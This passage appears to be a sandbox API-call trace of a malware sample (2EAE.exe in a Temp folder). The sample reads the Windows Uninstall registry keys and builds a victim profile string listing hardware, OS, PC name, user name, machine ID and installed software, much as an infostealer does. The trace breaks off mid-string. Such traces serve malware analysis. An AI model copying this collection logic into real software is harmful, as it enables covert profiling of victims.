RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español" [0175.916] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.916] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español " [0175.916] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001" [0175.916] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\n" [0175.916] RegCloseKey (hKey=0x354) returned 0x0 [0175.916] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x27, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-002C-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.916] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-002C-0409-0000-0000000FF1CE}") returned 90 [0175.933] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-002C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.933] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Office Proofing (English) 2016", lpcbData=0x197fd4*=0x29) returned 0x0 [0175.933] lstrlenA (lpString="Microsoft Office Proofing (English) 2016") returned 40 [0175.933] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\n", lpString2="Microsoft Office Proofing (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016" [0175.933] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.933] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English 